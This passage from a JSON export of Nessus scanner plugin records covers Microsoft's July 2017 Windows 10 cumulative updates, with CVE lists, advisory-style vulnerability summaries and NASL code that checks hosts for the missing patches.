(isnull(ret) || (ret != '1' && ret != '2'))\n {\n vuln = TRUE;\n reg_key_note =\n '\\n The registry key \"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\LdapEnforceChannelBinding\"' +\n '\\n is missing or is not equal to \"1\" or \"2\"' +\n '\\n';\n hotfix_add_report(reg_key_note, bulletin:bulletin);\n }\n}\n\nRegCloseKey(handle:hklm);\nclose_registry(close:FALSE);\n\n\nif (\n # Windows 10 1607 / Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"07_2017\", bulletin:bulletin, rollup_kb_list:kbs) ||\n vuln\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:54", "description": "The remote Windows 10 version 1511 host is missing security update\nKB4025344. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. 
A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8577,\n CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. 
An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in the\n Microsoft Common Runtime Library component due to\n improper handling of web requests. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to cause a denial of service condition\n in a .NET application. (CVE-2017-8585)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. 
(CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit these, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8595, CVE-2017-8598, CVE-2017-8603,\n CVE-2017-8604, CVE-2017-8605, CVE-2017-8619)\n\n - A security bypass vulnerability exists in Microsoft Edge\n due to a failure to correctly apply the same-origin\n policy for HTML elements present in other browser\n windows. An unauthenticated, remote attacker can exploit\n this, by convincing a user to follow a link, to cause\n the user to load a malicious website. 
(CVE-2017-8599)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8601)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8609)\n\n - A spoofing vulnerability exists in Microsoft Edge due to\n improper parsing of HTTP content. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to click a specially crafted URL, to redirect the user\n to a malicious website. (CVE-2017-8611)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. 
(CVE-2017-8618)", "edition": 29, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-11T00:00:00", "title": "KB4025344: Windows 10 Version 1511 July 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2017-07-11T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUL_4025344.NASL", "href": "https://www.tenable.com/plugins/nessus/101369", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101369);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8561\",\n \"CVE-2017-8562\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8573\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8585\",\n \"CVE-2017-8587\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\",\n \"CVE-2017-8595\",\n \"CVE-2017-8598\",\n \"CVE-2017-8599\",\n \"CVE-2017-8601\",\n 
\"CVE-2017-8602\",\n \"CVE-2017-8603\",\n \"CVE-2017-8604\",\n \"CVE-2017-8605\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8609\",\n \"CVE-2017-8611\",\n \"CVE-2017-8618\",\n \"CVE-2017-8619\"\n );\n script_bugtraq_id(\n 99439,\n 99432,\n 99431,\n 99429,\n 99428,\n 99427,\n 99426,\n 99425,\n 99424,\n 99423,\n 99421,\n 99420,\n 99419,\n 99418,\n 99417,\n 99416,\n 99414,\n 99413,\n 99412,\n 99410,\n 99409,\n 99408,\n 99407,\n 99406,\n 99403,\n 99402,\n 99400,\n 99399,\n 99398,\n 99397,\n 99396,\n 99394,\n 99393,\n 99392,\n 99391,\n 99390,\n 99389,\n 99388,\n 99387\n );\n script_xref(name:\"MSKB\", value:\"4025344\");\n script_xref(name:\"MSFT\", value:\"MS17-4025344\");\n\n script_name(english:\"KB4025344: Windows 10 Version 1511 July 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1511 host is missing security update\nKB4025344. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. 
(CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8577,\n CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). 
An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in the\n Microsoft Common Runtime Library component due to\n improper handling of web requests. 
An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to cause a denial of service condition\n in a .NET application. (CVE-2017-8585)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - Multiple remote code execution vulnerability exist in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. 
An unauthenticated,\n remote attacker can exploit these, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8595, CVE-2017-8598, CVE-2017-8603,\n CVE-2017-8604, CVE-2017-8605, CVE-2017-8619)\n\n - A security bypass vulnerability exists in Microsoft Edge\n due to a failure to correctly apply the same-origin\n policy for HTML elements present in other browser\n windows. An unauthenticated, remote attacker can exploit\n this, by convincing a user to follow a link, to cause\n the user to load a malicious website. (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8601)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. 
(CVE-2017-8609)\n\n - A spoofing vulnerability exists in Microsoft Edge due to\n improper parsing of HTTP content. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to click a specially crafted URL, to redirect the user\n to a malicious website. (CVE-2017-8611)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. (CVE-2017-8618)\");\n # https://support.microsoft.com/en-us/help/4025344/windows-10-update-kb4025344\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e69fa96a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4025344.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is 
Copyright (C) 2017-2020 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-07';\nkb = make_list(\n '4025344' # 10 1151\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kb, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"07_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4025344))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:53", "description": "The remote Windows host is missing security update 4025338.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. 
An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8589)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine, when rendered in Internet\n Explorer, handles objects in memory. In a web-based\n attack scenario, an attacker could host a specially\n crafted website that is designed to exploit this\n vulnerability through Internet Explorer and then\n convince a user to view the website. An attacker could\n also embed an ActiveX control marked \"safe for\n initialization\" in an application or Microsoft\n Office document that hosts the Internet Explorer\n rendering engine. The attacker could also take advantage\n of compromised websites and websites that accept or host\n user-provided content or advertisements. These websites\n could contain specially crafted content that could\n exploit this vulnerability. An attacker who successfully\n exploited this vulnerability could gain the same user\n rights as the current user. (CVE-2017-8618)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8467, CVE-2017-8556,\n CVE-2017-8573, CVE-2017-8577, CVE-2017-8578,\n CVE-2017-8580)\n\n - A Denial Of Service vulnerability exists when Windows\n Explorer attempts to open a non-existent file. An\n attacker who successfully exploited this vulnerability\n could cause a denial of service. 
An attacker could\n exploit this vulnerability by hosting a specially\n crafted web site and convincing a user to browse to the\n page, containing the reference to the non-existing file,\n and cause the victim's system to stop responding. An\n attacker could not force a user to view the attacker-\n controlled content. Instead, an attacker would have to\n convince a user to take action. For example, an attacker\n could trick a user into clicking a link that takes the\n user to the attacker's site. The update addresses the\n vulnerability by correcting how Windows Explorer handles\n open attempts for non-existent files. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in the way\n JavaScript engines render when handling objects in\n memory in Microsoft browsers. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2017-8606, CVE-2017-8607,\n CVE-2017-8608)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when Kerberos fails to prevent\n tampering with the SNAME field during ticket exchange.\n An attacker who successfully exploited this\n vulnerability could use it to bypass Extended Protection\n for Authentication. (CVE-2017-8495)\n\n - A remote code execution vulnerability exists in the way\n that the Scripting Engine renders when handling objects\n in memory in Microsoft browsers. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. 
(CVE-2017-8609)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2017-8561)\n\n - A remote code execution vulnerability exists in\n PowerShell when PSObject wraps a CIM Instance. An\n attacker who successfully exploited this vulnerability\n could execute malicious code on a vulnerable system. In\n an attack scenario, an attacker could execute malicious\n code in a PowerShell remote session. The update\n addresses the vulnerability by correcting how PowerShell\n deserializes user-supplied scripts. (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8562)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows when Win32k fails to properly handle\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the user's system. (CVE-2017-8486)\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console when it improperly\n parses XML input containing a reference to an external\n entity. An attacker who successfully exploited this\n vulnerability could read arbitrary files via an XML\n external entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. 
An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8595, CVE-2017-8605,\n CVE-2017-8619)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. (CVE-2017-8590)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8564)\n\n - A security feature bypass vulnerability exists when\n Microsoft Browsers improperly handle redirect requests.\n This vulnerability allows Microsoft Browsers to bypass\n CORS redirect restrictions and to follow redirect\n requests that should otherwise be ignored. An attacker\n who successfully exploited this vulnerability could\n force the browser to send data that would otherwise be\n restricted to a destination web site of their choice.\n (CVE-2017-8592)\n\n - An Information Disclosure vulnerability exists when the\n HTTP.sys server application component improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the HTTP.sys server application\n system. A remote unauthenticated attacker could exploit\n this vulnerability by issuing a request to the HTTP.sys\n server application. The update addresses the\n vulnerability by correcting how the HTTP.sys server\n application handles objects in memory. 
(CVE-2017-8582)\n\n - A spoofing vulnerability exists when an affected\n Microsoft browser does not properly parse HTTP content.\n An attacker who successfully exploited this\n vulnerability could trick a user by redirecting the user\n to a specially crafted website. The specially crafted\n website could either spoof content or serve as a pivot\n to chain an attack with other vulnerabilities in web\n services. (CVE-2017-8602)\n\n - A denial of service vulnerability exists when Microsoft\n Common Object Runtime Library improperly handles web\n requests. An attacker who successfully exploited this\n vulnerability could cause a denial of service against a\n .NET web application. A remote unauthenticated attacker\n could exploit this vulnerability by issuing specially\n crafted requests to the .NET application. The update\n addresses the vulnerability by correcting how the .NET\n web application handles web requests. (CVE-2017-8585)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context.\n (CVE-2017-8581)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when a man-in-the-middle attacker is\n able to successfully forward an authentication request\n to a Windows LDAP server, such as a system running\n Active Directory Domain Services (AD DS) or Active\n Directory Lightweight Directory Services (AD LDS), which\n has been configured to require signing or sealing on\n incoming connections. The update addresses this\n vulnerability by incorporating support for Extended\n Protection for Authentication security feature, which\n allows the LDAP server to detect and block such\n forwarded authentication requests once enabled.\n (CVE-2017-8563)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. 
An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8611)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge fails to correctly apply Same Origin\n Policy for HTML elements present in other browser\n windows. An attacker could use this vulnerability to\n trick a user into loading a page with malicious content.\n (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft WordPad parses specially crafted files.\n Exploitation of this vulnerability requires that a user\n open a specially crafted file with an affected version\n of Microsoft WordPad. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists when\n Windows Explorer improperly handles executable files and\n shares during rename operations. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in the context of another user. Users not\n running as administrators would be less affected.\n (CVE-2017-8463)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. In a web-based attack scenario, an attacker could\n host a specially crafted website that is designed to\n exploit the vulnerability through Microsoft browsers and\n then convince a user to view the website. 
